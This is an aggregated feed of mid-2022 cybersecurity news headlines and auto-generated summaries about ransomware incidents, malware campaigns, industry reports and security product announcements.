    Autosummary: With the healthcare industry continuing to be a top attack vector for cybercriminals and ransomware threat groups, H1 2022 saw an interesting change in targets as attackers moved from large hospital systems and payers, big targets that would likely yield the most data but also have more sophisticated defenses, to smaller hospital systems and specialty clinics that lack the same level of security preparedness, staff size, or budget. "

    ---

    Alteryx Server-FIPS enables users to scale analytics initiatives across public sector agencies

    industry
    2022-08-26 https://www.helpnetsecurity.com/2022/08/26/alteryx-server-fips/
    

    Alteryx announced Alteryx Server-FIPS, a version of its Server offering that is aligned with the Federal Information Processing Standards (FIPS) for data security and computer systems. The launch of Server-FIPS is monumental for the use of analytics in public sector environments that require enhanced data encryption. Alteryx Server-FIPS is a FIPS-capable and scalable server-based product for scheduling, sharing, and running apps and models created in Alteryx Designer-FIPS for others in the organization to leverage. This … More →

    The post Alteryx Server-FIPS enables users to scale analytics initiatives across public sector agencies appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    How fast is the financial industry fixing its software security flaws?

    financial industry
    2022-08-26 https://www.helpnetsecurity.com/2022/08/26/financial-software-security-flaws/
    

    Veracode released data revealing that the financial services industry ranks among the best for overall flaw percentage when compared to other industries, but has one of the lowest fix rates for software security flaws. The sector also falls to the middle of the pack for high-severity flaws, with 18 percent of applications containing a serious vulnerability, suggesting financial firms should prioritize identifying and remediating the flaws that matter most. The findings were outlined in the … More →

    The post How fast is the financial industry fixing its software security flaws? appeared first on Help Net Security.

    "

    Autosummary: Although the finance sector outperforms most other industries in fix times for flaws discovered by dynamic, SCA, and static, the study found there is still ample room for continued improvement when looking at the number of days it takes to resolve 50 percent of flaws—116 days for dynamic analysis, 385 days for SCA, and 288 days for static analysis. "

    ---

    Exploits and TrickBot disrupt manufacturing operations

    exploits industry
    2022-08-25 https://www.malwarebytes.com/blog/threat-intelligence/2022/08/exploits-and-trickbot-disrupt-manufacturing-operations
    

    Categories: Threat Intelligence September 2021 saw a huge spike of exploit detections against the manufacturing industry, with a distributed spread between California, Florida, Ohio, and Missouri. This is combined with heavy detections of unseen malware, identified through our AI engine, spiking in May as well as September 2021. (Read more...)

    The post Exploits and TrickBot disrupt manufacturing operations appeared first on Malwarebytes Labs.

    "

    Autosummary: Posted: August 25, 2022 by September 2021 saw a huge spike of exploit detections against the manufacturing industry, with a distributed spread between California, Florida, Ohio, and Missouri. September 2021 saw a huge spike of exploit detections against the manufacturing industry, with a distributed spread between California, Florida, Ohio, and Missouri.For example, the video card maker NVIDIA dealt with a significant attack in February 2022; March saw the infection of the tool manufacturer Snap-On Tools by Conti ransomware; in April there was an operation against General Motors; and in May, infiltration of the agricultural company, AGCO. "

    ---

    A major European logistics company selects IronNet to improve its operational security

    industry
    2022-08-25 https://www.helpnetsecurity.com/2022/08/26/ironnet-european-logistics-company/
    

    IronNet announced that a major European logistics company, offering courier, package delivery and express mail service, will deploy the IronNet Collective DefenseSM platform to help defend against increased cyber threats facing the sector. The logistics company is remaining anonymous to help protect its operational security. It serves millions of customers across Europe, provides pick-up and drop-off points for package and parcel services as well as door-to-door courier and fulfillment services for e-merchants. “Cyber attacks along … More →

    The post A major European logistics company selects IronNet to improve its operational security appeared first on Help Net Security.

    "

    Autosummary: The security platform will enable the logistics company to leverage NDR capabilities, powered by behavioral analytics, to detect unknown threats on its network and, in turn, anonymously in real-time exchange visibility with others in the Collective Defense community. "

    ---

    Data Dynamics StorageX9.0 helps customers manage sprawls of unstructured data

    industry
    2022-08-24 https://www.helpnetsecurity.com/2022/08/24/data-dynamics-storagex9-0/
    

    Data Dynamics released StorageX9.0, expanding and enhancing the existing product functionalities to help customers manage sprawls of unstructured data and its complexities. It enables enterprises to categorize & analyze their data, draw actionable insights, apply security practices, maintain compliance, and enhance business performance. StorageX 9.0 is power packed with new features, including Share and DFS analytics, NFSv4 and NFSv3 POSIX security translation, and support for versioned object mobility. “StorageX 9.0 is an enhancement to our … More →

    The post Data Dynamics StorageX9.0 helps customers manage sprawls of unstructured data appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    New social engineering tactics discovered in the wild

    industry
    2022-08-24 https://www.helpnetsecurity.com/2022/08/24/new-social-engineering-tactics-video/
    

    In this Help Net Security video, Otavio Freire, President and CTO at SafeGuard Cyber, offers insight on new social engineering tactics discovered in the wild, and illustrates how phishing attacks are changing, including how they’re evolving beyond email.

    The post New social engineering tactics discovered in the wild appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    DDoS attacks jump 203%, patriotic hacktivism surges

    industry
    2022-08-23 https://www.helpnetsecurity.com/2022/08/23/malicious-ddos-attacks-climbed/
    

    Radware released a report revealing that the number of malicious DDoS attacks climbed by 203% compared to the first six months of 2021. The report also underscores how Russia’s invasion of Ukraine has altered the focus of the threat landscape — shifting it from the consequences of the pandemic to a ground swell of DDoS activity launched by patriotic hacktivists. “The threat landscape saw a marked shift in the first half of 2022,” said Pascal … More →

    The post DDoS attacks jump 203%, patriotic hacktivism surges appeared first on Help Net Security.

    "

    Autosummary: Major information and communication networks in the Philippines, including CNN, news network ABS-CBN, Rappler, and VERA Files, were the target of DDoS attacks in connection with the country’s 2022 general elections. Retail and high-tech top industries for most web attacks During the first six months of 2022, there was an increase in malicious transactions targeting online applications, dominated by predictable resource location and injection attacks. "

    ---

    New Grandoreiro Banking Malware Campaign Targeting Spanish Manufacturers

    financial exploits industry
    2022-08-20 https://thehackernews.com/2022/08/new-grandoreiro-banking-malware.html
    Organizations in the Spanish-speaking nations of Mexico and Spain are in the crosshairs of a new campaign designed to deliver the Grandoreiro banking trojan.  "In this campaign, the threat actors impersonate government officials from the Attorney General"s Office of Mexico City and from the Public Ministry in the form of spear-phishing emails in order to lure victims to download and execute " "

    Autosummary: "

    ---

    Grandoreiro banking malware targets manufacturers in Spain, Mexico

    financial exploits latam industry
    2022-08-19 https://www.bleepingcomputer.com/news/security/grandoreiro-banking-malware-targets-manufacturers-in-spain-mexico/
    The notorious "Grandoreiro" banking trojan was spotted in recent attacks targeting employees of a chemicals manufacturer in Spain and workers of automotive and machinery makers in Mexico. [...] "

    Autosummary: The backdoor capabilities of the malware on the host include: Keylogging Auto-Updation for newer versions and modules Web-Injects and restricting access to specific websites Command execution Manipulating windows Guiding the victim"s browser to a specific URL C2 Domain Generation via DGA (Domain Generation Algorithm) Imitating mouse and keyboard movements Outlook The recent campaign indicates that Grandoreiro"s operators are interested in conducting highly-targeted attacks instead of sending large volumes of spam emails to random recipients. "

    ---

    The Week in Ransomware - August 19th 2022 - Evolving extortion tactics

    exploits ransomware industry
    2022-08-19 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-19th-2022-evolving-extortion-tactics/
    Bringing you the latest ransomware news, including new research, tactics, and cyberattacks. We also saw the return of the BlackByte ransomware operation, who has started to use new extortion tactics. [...] "

    Autosummary: Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @LawrenceAbrams, @PolarToffee, @BleepinComputer, @Seifreed, @jorntvdw, @fwosar, @serghei, @struppigel, @FourOctets, @demonslay335, @malwrhunterteam, @Ionut_Ilascu, @malwareforme, @VK_Intel, @DanielGallagher, @juanbrodersen, @AlvieriD, @Cyberknow20, @Intel_by_KELA, @MauroEldritch, @luisezegarra, @Cleafy, and @pcrisk. "

    ---

    IoT: The huge cybersecurity blind spot that’s costing millions

    industry ciber
    2022-08-18 https://www.helpnetsecurity.com/2022/08/18/iot-cybersecurity-blind-spots/
    

    In many ways, IoT has made our lives easier. We are technologically connected in ways we never thought possible. But organizations need to be aware of the cybersecurity blind spots generated by the prevalence of IoT technology, because connected devices are opening virtual doors into organizations’ networks. The enterprise IoT cybersecurity blind spots According to Forrester, over 60% of enterprise cyberattacks originate from the trust organizations place in their partner or vendor, and vulnerable devices … More →

    The post IoT: The huge cybersecurity blind spot that’s costing millions appeared first on Help Net Security.

    "

    Autosummary: The enterprise IoT cybersecurity blind spots According to Forrester, over 60% of enterprise cyberattacks originate from the trust organizations place in their partner or vendor, and vulnerable devices ending up in the end-product or system ecosystem – which is where the blind spot comes in.As an industry-recognized seal of approval, vendors and partners can be sure that the products they are working with meet the high standards they need, and create a strong, trusting relationship between them. "

    ---

    Business Services industry targeted across the country for backdoor access

    government industry
    2022-08-18 https://www.malwarebytes.com/blog/threat-intelligence/2022/08/business-services-targeted-across-the-country-for-backdoor-access
    

    Categories: Threat Intelligence High detections of hacking tools for the Business Services industry shows that attackers likely sought to infect businesses and install backdoors for future access to their customers. (Read more...)

    The post Business Services industry targeted across the country for backdoor access appeared first on Malwarebytes Labs.

    "

    Autosummary: A subsequent spike of this threat in August 2021 coincides with three major attacks, likely achieved because of the success of CVE-2021-21551.These were the Kaseya Breach which spread REvil to hundreds of networks, the ransomware attack on insurance firm Accenture, which demanded $50 million in payment, and the T-Mobile data breach which exposed the information of 50 million people. "

    ---

    TXOne Networks raises $70 million to defend industry verticals against cybersecurity threats

    industry ciber
    2022-08-18 https://www.helpnetsecurity.com/2022/08/19/txone-networks-funding/
    

    TXOne Networks has entered into definitive agreements in connection with its Series B financing with total investment proceeds of $70 million. The latest capital injection will be used to expand TXOne Networks’ global presence and defend industry verticals worldwide against cybersecurity threats to industrial control systems (ICS). The new funding round was led by TGVest Capital ($20 million), with participation from KAiA Capital, CDIB Capital Group, CDIB-Innolux L.P., MediaTek, Ta Ya Electric Wire & Cable, … More →

    The post TXOne Networks raises $70 million to defend industry verticals against cybersecurity threats appeared first on Help Net Security.

    "

    Autosummary: The new funding round was led by TGVest Capital ($20 million), with participation from KAiA Capital, CDIB Capital Group, CDIB-Innolux L.P., MediaTek, Ta Ya Electric Wire & Cable, Ta Ya Venture Capital, Simplo Technology Group, CHT Security Corporation and Ash Tower Limited, as well as Steven Pan, Silks Hotel Group Chair, and Chun-I Wu, TAYIH Group Chair. "

    ---

    How attackers are exploiting corporate IoT

    exploits industry
    2022-08-17 https://www.helpnetsecurity.com/2022/08/17/how-attackers-are-exploiting-corporate-iot-video/
    

    In this Help Net Security video, Brian Contos, CSO at Phosphorus Cybersecurity, discusses how most companies consider IoT threats to be limited in scope. In actuality, a growing number of sophisticated adversaries are realizing the true value of IoT as an easy initial breach point to get access to the corporate network. These devices also enable them to achieve long-term persistence through network footholds that will avoid detection and survive remediation.

    The post How attackers are exploiting corporate IoT appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    BlackByte ransomware gang is back with new extortion tactics

    exploits ransomware industry
    2022-08-17 https://www.bleepingcomputer.com/news/security/blackbyte-ransomware-gang-is-back-with-new-extortion-tactics/
    The BlackByte ransomware is back with version 2.0 of their operation, including a new data leak site utilizing new extortion techniques borrowed from LockBit. [...] "

    Autosummary: "

    ---

    New Evil PLC Attack Weaponizes PLCs to Breach OT and Enterprise Networks

    industry
    2022-08-16 https://thehackernews.com/2022/08/new-evil-plc-attack-weaponizes-plcs-to.html
    Cybersecurity researchers have elaborated a novel attack technique that weaponizes programmable logic controllers (PLCs) to gain an initial foothold in engineering workstations and subsequently invade the operational technology (OT) networks. Dubbed "Evil PLC" attack by industrial security firm Claroty, the issue impacts engineering workstation software from Rockwell Automation, Schneider "

    Autosummary: Dubbed "Evil PLC" attack by industrial security firm Claroty, the issue impacts engineering workstation software from Rockwell Automation, Schneider Electric, GE, B&R, Xinje, OVARRO, and Emerson. "

    ---

    Feds: Zeppelin Ransomware Resurfaces with New Compromise, Encryption Tactics

    exploits ransomware industry
    2022-08-12 https://threatpost.com/zeppelin-ransomware-resurfaces/180405/
    The CISA has seen a resurgence of the malware targeting a range of verticals and critical infrastructure organizations by exploiting RDP, firewall vulnerabilities. "

    Autosummary: Multiple Encryption Once Zeppelin ransomware is executed on a network, each encrypted file is appended with a randomized nine-digit hexadecimal number as a file extension, e.g., file.txt.txt.C59-E0C-929, according to the CISA. "

    ---

    Cymulate improves risk visibility for businesses with new analytics capabilities

    industry
    2022-08-10 https://www.helpnetsecurity.com/2022/08/10/cymulate-xspm-platform/
    

    Cymulate announced the expansion of its Extended Security Posture Management (XSPM) Platform to include advanced insights and analytics capabilities. As businesses struggle to manage attack surfaces and validate security controls, these new data-driven capabilities significantly improve risk visibility and deliver actionable insights for reducing remediation time. Businesses also now gain enhanced levels of granularity for setting and tracking cybersecurity performance metrics and KPIs, which are required for improving cyber resilience. “­­Now, more than ever, organizations … More →

    The post Cymulate improves risk visibility for businesses with new analytics capabilities appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    OPSWAT’s malware analysis capabilities protect ICS/OT environments against cyber threats

    exploits industry
    2022-08-10 https://www.helpnetsecurity.com/2022/08/10/opswat-metadefender-malware-analyzer/
    

    OPSWAT announced new malware analysis capabilities for IT and OT at the Black Hat USA 2022 conference. These enhancements include OPSWAT Sandbox for OT with detection of malicious communications on OT network protocols and support for open-source third-party tools in its MetaDefender Malware Analyzer solution. With increased threats and growing concerns around propagation into OT networks within critical infrastructure environments, threat intelligence for both the IT and OT sides of the business is essential in … More →

    The post OPSWAT’s malware analysis capabilities protect ICS/OT environments against cyber threats appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Automotive supplier breached by 3 ransomware gangs in 2 weeks

    exploits ransomware industry
    2022-08-10 https://www.bleepingcomputer.com/news/security/automotive-supplier-breached-by-3-ransomware-gangs-in-2-weeks/
    An automotive supplier had its systems breached and files encrypted by three different ransomware gangs over a two-week span in May, two of the attacks happening within just two hours. [...] "

    Autosummary: Breached three times within two months After the initial compromise, LockBit, Hive, and ALPHV/BlackCat affiliates also gained access to the victim"s network on April 20, May 1, and May 15, respectively. "

    ---

    NetRise Platform provides continuous monitoring of XIoT firmware vulnerabilities

    ransomware industry
    2022-08-09 https://www.helpnetsecurity.com/2022/08/09/netrise-platform/
    

    NetRise released the NetRise Platform, which is providing insights into shared vulnerabilities across XIoT firmware images in an organization. NetRise is a cloud-based SaaS platform that analyzes and monitors the firmware of XIoT devices. The firmware images are then dissected, presenting all of the key data, artifacts, and risk in an easy-to-consume interface. As a result, NetRise reduces the time and cost of firmware security programs allowing organizations to find and remediate previously undetected issues. … More →

    The post NetRise Platform provides continuous monitoring of XIoT firmware vulnerabilities appeared first on Help Net Security.

    "

    Autosummary: NetRise continuously monitors and analyzes artifacts within firmware to identify and prioritize: NetRise continuously monitors and analyzes artifacts within firmware to identify and prioritize: Vulnerabilities (known and unknown) Compliance adherence Software bill of materials (SBOM) Misconfigurations Overall risk Key features: Vulnerability identification and Monitoring Comprehensive SBOM Risk comparisons of new firmware versions to existing versions Vulnerability and other risk prioritization Correlation across all monitored devices Firmware repository to query when new vulnerabilities are identified “NetRise provides the perfect solution for mapping XIoT devices to traditional security processes,” said Michael Scott, Co-Founder & CTO of NetRise. "

    ---

    Chinese Hackers Targeted Dozens of Industrial Enterprises and Public Institutions

    industry
    2022-08-09 https://thehackernews.com/2022/08/chinese-hackers-targeted-dozens-of.html
    Over a dozen military-industrial complex enterprises and public institutions in Afghanistan and Europe have come under a wave of targeted attacks since January 2022 to steal confidential data by simultaneously making use of six different backdoors. Russian cybersecurity firm Kaspersky attributed the attacks "with a high degree of confidence" to a China-linked threat actor tracked by Proofpoint "

    Autosummary: Other backdoors utilized in the attacks include nccTrojan, Cotx, DNSep, Logtu, and a previously undocumented malware dubbed as CotSam, so named owing to its similarities with Cotx. "

    ---

    Chinese actors behind attacks on industrial enterprises and public institutions

    industry
    2022-08-09 https://securityaffairs.co/wordpress/134180/apt/china-apt-attacks-industrial-enterprises.html
    

    China-linked threat actors targeted dozens of industrial enterprises and public institutions in Afghanistan and Europe. In January 2022, researchers at Kaspersky ICS CERT uncovered a series of targeted attacks on military industrial enterprises and public institutions in Afghanistan and East Europe. The attackers breached dozens of enterprises and in some cases compromised their IT infrastructure, […]

    The post Chinese actors behind attacks on industrial enterprises and public institutions appeared first on Security Affairs.

    "

    Autosummary: The Portdoor backdoor implements multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration. "

    ---

    IDEX Biometrics and Reltime collaborate to launch Web3 biometric payment card

    industry
    2022-08-09 https://www.helpnetsecurity.com/2022/08/10/idex-biometrics-reltime/
    

    IDEX Biometrics and Reltime formed a partnership to jointly develop and market Web3 biometric payment card including cold storage and digital asset wallets, combined with digital identification. This all-in-one, EMV compliant biometric payment card is anticipated to reach the market in the first half of 2023. The biometric solution based on IDEX Biometrics sensor technology will enable EMV compliant payments alongside Reltime’s global Web3 financial ecosystem’s unique “check-out” feature. Securing fiat and digital asset transactions … More →

    The post IDEX Biometrics and Reltime collaborate to launch Web3 biometric payment card appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Data privacy regulation a top three challenge for IoT adopters

    industry
    2022-08-08 https://www.helpnetsecurity.com/2022/08/08/data-privacy-regulation-challenge-iot-adopters/
    

    Fears over security have become less of a concern for organizations adopting IoT solutions than it was five years ago, according to a recent study by Wi-SUN Alliance, a global member-based association of industry leading companies driving the adoption of interoperable wireless solutions for use in smart cities, smart utilities, IoT and industrial IoT (IIoT) applications. The Journey to IoT Maturity, a follow-up to Wi-SUN’s ‘state of the nation’ IoT study in 2017, is based … More →

    The post Data privacy regulation a top three challenge for IoT adopters appeared first on Help Net Security.

    "

    Autosummary: The Journey to IoT Maturity, a follow-up to Wi-SUN’s ‘state of the nation’ IoT study in 2017, is based on interviews with IT decision makers from UK and US IoT adopters within key industries, including energy and utilities, state and local government, construction, technology, and telecommunications. "

    ---

    New IoT RapperBot Malware Targeting Linux Servers via SSH Brute-Forcing Attack

    exploits industry
    2022-08-07 https://thehackernews.com/2022/08/new-iot-rapperbot-malware-targeting.html
    A new IoT botnet malware dubbed RapperBot has been observed rapidly evolving its capabilities since it was first discovered in mid-June 2022. "This family borrows heavily from the original Mirai source code, but what separates it from other IoT malware families is its built-in capability to brute force credentials and gain access to SSH servers instead of Telnet as implemented in Mirai," "

    Autosummary: "Since mid-July, RapperBot has switched from self-propagation to maintaining remote access into the brute-forced SSH servers," the researchers said. "

    ---

    Phishy calls and emails play on energy cost increase fears

    industry
    2022-08-07 https://blog.malwarebytes.com/cybercrime/2022/08/phishy-calls-and-emails-play-on-energy-cost-increase-fears/
    

    We take a look at a wave of scams involving people"s fears of increasing energy prices, and how to avoid being caught out.

    The post Phishy calls and emails play on energy cost increase fears appeared first on Malwarebytes Labs.

    "

    Autosummary: If you receive an unexpected call about energy prices or rebates, Insist on calling “them” back on their official number, taken from an official website, directly.Posted: August 7, 2022 by We take a look at a wave of scams involving people"s fears of increasing energy prices, and how to avoid being caught out. "

    ---

    Serious cyberattack hits German Chambers of Industry and Commerce (DIHK)

    industry ciber
    2022-08-07 https://securityaffairs.co/wordpress/134121/hacking/dihk-cyberattack.html
    

    A massive cyberattack hit the website of the German Chambers of Industry and Commerce (DIHK) this week. A massive attack hit the website of the German Chambers of Industry and Commerce (DIHK) forcing the organization to shut down its IT systems as a precautionary measure for security reasons. “Due to a possible cyber attack, the […]

    The post Serious cyberattack hits German Chambers of Industry and Commerce (DIHK) appeared first on Security Affairs.

    "

    Autosummary: "

    ---

    Phishy calls and emails play on energy cost increase fears

    industry
    2022-08-07 https://www.malwarebytes.com/blog/news/2022/08/blog-post
    

    Categories: News Categories: Scams Tags: scam Tags: phish Tags: email Tags: social engineering Tags: gas Tags: electricity Tags: energy company Tags: rebate Tags: discount Tags: switch We take a look at a wave of scams involving people"s fears of increasing energy prices, and how to avoid being caught out. (Read more...)

    The post Phishy calls and emails play on energy cost increase fears appeared first on Malwarebytes Labs.

    "

    Autosummary: If you receive an unexpected call about energy prices or rebates, Insist on calling "them" back on their official number, taken from an official website, directly.Posted: August 6, 2022 by We take a look at a wave of scams involving people"s fears of increasing energy prices, and how to avoid being caught out. "

    ---

    German Chambers of Industry and Commerce hit by "massive" cyberattack

    industry ciber
    2022-08-04 https://www.bleepingcomputer.com/news/security/german-chambers-of-industry-and-commerce-hit-by-massive-cyberattack/
    The Association of German Chambers of Industry and Commerce (DIHK) was forced to shut down all of its IT systems and switch off digital services, telephones, and email servers, in response to a cyberattack. [...] "

    Autosummary: "

    ---

    Claroty xDome strengthens cyber and operational resilience for industrial enterprises

    industry
    2022-08-03 https://www.helpnetsecurity.com/2022/08/03/claroty-xdome/
    

    Claroty released Claroty xDome, a cloud-based industrial cybersecurity platform that drives cyber and operational resilience for modern industrial enterprises. Claroty xDome is the solution that delivers the ease and scalability of SaaS without compromising on the breadth or depth of the visibility, protection, and monitoring controls that are integral to the entire CPS security journey — especially amid the rapid expansion of CPS across the XIoT. According to Gartner, “Over time, the technologies that underpin … More →

    The post Claroty xDome strengthens cyber and operational resilience for industrial enterprises appeared first on Help Net Security.

    "

    Autosummary: Claroty xDome is the solution that delivers the ease and scalability of SaaS without compromising on the breadth or depth of the visibility, protection, and monitoring controls that are integral to the entire CPS security journey — especially amid the rapid expansion of CPS across the XIoT. According to Gartner, “Over time, the technologies that underpin critical infrastructure have become more digitized and connected — either to enterprise IT systems and/or to each other — creating cyber-physical systems.While other SaaS solutions rely solely on passive monitoring, xDome offers this plus other methods, giving customers both effective asset discovery and the ease and scalability of SaaS. A complete XIoT asset inventory is foundational to CPS security, and attaining it requires combining multiple asset discovery methods tailored to each environment’s unique needs. "

    ---

    Power semiconductor component manufacturer Semikron suffered a ransomware attack

    exploits ransomware industry
    2022-08-03 https://securityaffairs.co/wordpress/133975/cyber-crime/semikron-cyber-attack.html
    

    Semikron, a German-based independent manufacturer of power semiconductor components, suffered a ransomware cyberattck. Semikron is a German-based independent manufacturer of power semiconductor components, it employs more than 3,000 people in 24 subsidiaries worldwide, with production sites in Germany, Brazil, China, France, India, Italy, Slovakia and the USA. The company confirmed it has suffered a cyberattack conducted by a professional […]

    The post Power semiconductor component manufacturer Semikron suffered a ransomware attack appeared first on Security Affairs.

    "

    Autosummary: "

    ---

    Gootkit AaaS malware is still active and uses updated tactics

    exploits industry
    2022-08-02 https://securityaffairs.co/wordpress/133918/malware/gootkit-is-still-active.html
    

    Gootkit access-as-a-service (AaaS) malware is back with tactics and fileless delivery of Cobalt Strike beacons. Gootkit runs on an access-a-as-a-service model, it is used by different groups to drop additional malicious payloads on the compromised systems. Gootkit has been known to use fileless techniques to deliver threats such as the SunCrypt, and REvil (Sodinokibi) ransomware, Kronos trojans, […]

    The post Gootkit AaaS malware is still active and uses updated tactics appeared first on Security Affairs.

    "

    Autosummary: “When the user downloaded and opened this file, it spawned an obfuscated script which, through registry stuffing, installed a chunk of encrypted codes in the registry and added scheduled tasks for persistence. "

    ---

    Semiconductor manufacturer Semikron hit by LV ransomware attack

    exploits ransomware industry
    2022-08-02 https://www.bleepingcomputer.com/news/security/semiconductor-manufacturer-semikron-hit-by-lv-ransomware-attack/
    German power electronics manufacturer Semikron has disclosed that it was hit by a ransomware attack that partially encrypted the company"s network. [...] "

    Autosummary: "

    ---

    Netskope acquires Infiot to provide users with optimized connections between any enterprise location

    industry
    2022-08-02 https://www.helpnetsecurity.com/2022/08/03/netskope-infiot/
    

    Netskope announced it has acquired Infiot, a pioneer in enabling secure access with zero trust security, network and application optimization, and AI-driven operations. As Netskope Borderless WAN, the addition of Infiot’s technology will enable Netskope customers to apply uniform security and quality of experience (QoE) policies to the widest range of hybrid work needs, from employees at home or on-the-go, to branch offices, ad-hoc point-of-sale systems, and multi-cloud environments. For customers, all of these capabilities … More →

    The post Netskope acquires Infiot to provide users with optimized connections between any enterprise location appeared first on Help Net Security.

    "

    Autosummary: Netskope Borderless WAN critical use cases include: Easy access to Netskope Intelligent SSE services powered by Netskope NewEdge infrastructure All-in-one intelligent access, routing, wireless WAN, network security, app assurance, and edge compute as an effective way to modernize, simplify and implement SASE architecture The ability to offload MPLS and eliminate costs by sending more traffic direct-to-net, eliminate backhauling and leverage fixed/mobile connectivity options (such as 4G/5G) Better guaranteed WAN connectivity to ensure end-to-end performance, from the “last mile” to the cloud or legacy data center Simplified operational overhead associated with running custom third-party applications “Today, leaders across IT, security, and networking and the world’s best-known analyst firms agree that the explosion of data and devices, along with the numerous ways that people connect, communicate, and collaborate, make the transformation of both networking and security a critical imperative for businesses and governments. Relevant to SASE growth, Gartner notes: “By 2024, 80% of SD-WAN deployments will incorporate SSE requirements, up from less than 25% in 2022” “By 2025, 80% of enterprises will adopt a strategy to unify web, cloud services, and private application access from a single vendor’s SSE platform” Despite SASE’s popularity, however, confusing vendor messaging often accompanies piecemeal product sets that are spuriously marketed as “SASE.” "

    ---

    Threat actor claims to have hacked European manufacturer of missiles MBDA

    industry
    2022-07-31 https://securityaffairs.co/wordpress/133881/data-breach/mbda-alleged-data-breach.html
    

    Threat actors that go online with the moniker Adrastea claim to have hacked the multinational manufacturer of missiles MBDA. MBDA is a European multinational developer and manufacturer of missiles that was the result of the merger of the main French, British and Italian missile systems companies (Aérospatiale–Matra, BAE Systems, and Finmeccanica (now Leonardo). The name MBDA comes from the initialism of the names missile companies: Matra, BAe Dynamics and Alenia. A threat actor […]

    The post Threat actor claims to have hacked European manufacturer of missiles MBDA appeared first on Security Affairs.

    "

    Autosummary: “The downloaded data contains confidential and closed information about the employees of your company, which took part in the development of closed military projects of MBDA (PLANCTON, CRONOS, CA SIRIUS, EMADS, MCDS, B1NT etc.) and about the commercial activities of your company in the interests of the Ministry of Defense of the European Union (design documentation of the air defense, missile systems and systems of coastal protection, drawings, presentation , video and photo (3D) materials, contract agreements and correspondence with other companies Rampini Carlo, Netcomgroup, Rafael, Thales, ST Electronics etc.).” "

    ---

    Ransomware looms large over the cyber insurance industry

    exploits industry
    2022-07-29 https://www.helpnetsecurity.com/2022/07/29/ransomware-cyber-insurance-video/
    

    A Panaseer survey of global insurers across the UK and US found that 82% are expecting the rise in premiums to continue, with 74% of insurers agreeing that their inability to accurately understand a customer’s security posture is impacting price increases. This Help Net Security video highlights how the increasing cost of ransomware affects global insurers.

    The post Ransomware looms large over the cyber insurance industry appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Fortress Information Security and NetRise form a partnership to extend XIoT offering

    industry
    2022-07-28 https://www.helpnetsecurity.com/2022/07/29/netrise-fortress-information-security/
    

    NetRise and Fortress Information Security form a strategic partnership. This partnership gives Fortress Information Security’s global customers access to the firmware binary analysis platform. The NetRise team’s experience in data science, machine learning; and software reverse engineering expands Fortress customers’ ability to identify and catalog risk across a much larger set of devices and images. NetRise gains access to a robust route to market for power, oil and gas and manufacturing clients that Fortress serves, … More →

    The post Fortress Information Security and NetRise form a partnership to extend XIoT offering appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    CosmicStrand UEFI malware found in Gigabyte, ASUS motherboards

    exploits industry
    2022-07-26 https://www.bleepingcomputer.com/news/security/cosmicstrand-uefi-malware-found-in-gigabyte-asus-motherboards/
    Chinese-speaking hackers have been using since at least 2016 malware that lies virtually undetected in the firmware images for some motherboards, one of the most persistent threats commonly known as a UEFI rootkit. [...] "

    Autosummary: Overview of CosmicStrand UEFI malware execution source: Kaspersky Mark Lechtik, a former Kaspersky reverse engineer, now at Mandiant, who was involved in the research, explains that the compromised firmware images came with a modified CSMCORE DXE driver, which enables a legacy boot process. "

    ---

    Infosec pros want more industry cooperation and support for open standards

    industry
    2022-07-26 https://www.helpnetsecurity.com/2022/07/26/industry-cooperation-open-standards/
    

    Driven by security operations complexity, 46% of organizations are consolidating or plan on consolidating the number of vendors they do business with. As a result of this drive toward security technology consolidation, 77% of infosec pros would like to see more industry cooperation and support for open standards promoting interoperability. As thousands of cybersecurity technology vendors compete against each other across numerous security product categories, organizations are aiming to optimize all security technologies in their … More →

    The post Infosec pros want more industry cooperation and support for open standards appeared first on Help Net Security.

    "

    Autosummary: (51%) In addition: 53% tend to purchase or will in the future purchase security technology platforms rather than best-of-breed products 84% believe that a product’s integration capabilities are important and 86% of respondents say it is either critical or important that best-of-breed products are built for integration with other products After cost (46%), product integration capabilities are the most important security product consideration for 37% of security professionals Evaluating “enterprise-class” security vendors As the security technology market consolidates, “centers of gravity” will become established around a few large vendors and affect future buying strategies; organizations will place more bets on fewer security technology vendors. "

    ---

    IoT Botnets Fuels DDoS Attacks – Are You Prepared?

    industry
    2022-07-26 https://threatpost.com/ddos-attacks-prepared/180273/
    The increased proliferation of IoT devices paved the way for the rise of IoT botnets that amplifies DDoS attacks today. This is a dangerous warning that the possibility of a sophisticated DDoS attack and a prolonged service outage will prevent businesses from growing. "

    Autosummary: Monitor login attempts and create a lookout for spikes Keep IoT devices on protected networks Perform continuous security testing on IoT devices The Closure DDoS attacks are the standard intent of an IoT botnet.Further, most IoT devices include serious security issues like weak passwords, open access to management systems, default administrative credentials, or weak security configurations. "

    ---

    4 Steps Financial Industry Can Take to Cope With Their Growing Attack Surface

    financial industry
    2022-07-26 https://thehackernews.com/2022/07/4-steps-financial-industry-can-take-to.html
    The financial services industry has always been at the forefront of technology adoption, but the 2020 pandemic accelerated the widespread of mobile banking apps, chat-based customer service, and other digital tools. Adobe"s 2022 FIS Trends Report, for instance, found that more than half of the financial services and insurance firms surveyed experienced a notable increase in digital/mobile "

    Autosummary: Here"s the roadmap that financial institutions like Sander Capital Management are following: Step 1 — Knowing their attack surface Using Pentera to map their web-facing attack surface, they"re gathering a complete understanding of their domains, IPs, networks, services, and websites. Manual penetration testing Manual penetration testing allows organizations to see how a bank"s controls, for example, stand up to a real-world attack, while providing the added input of the attacker"s perspective.In most cases, a cybersecurity team will only receive a CVSS severity rating (none, low, medium, high, or critical) for each issue detected by the scan. "

    ---

    Experts Uncover New "CosmicStrand" UEFI Firmware Rootkit Used by Chinese Hackers

    industry
    2022-07-25 https://thehackernews.com/2022/07/experts-uncover-new-cosmicstrand-uefi.html
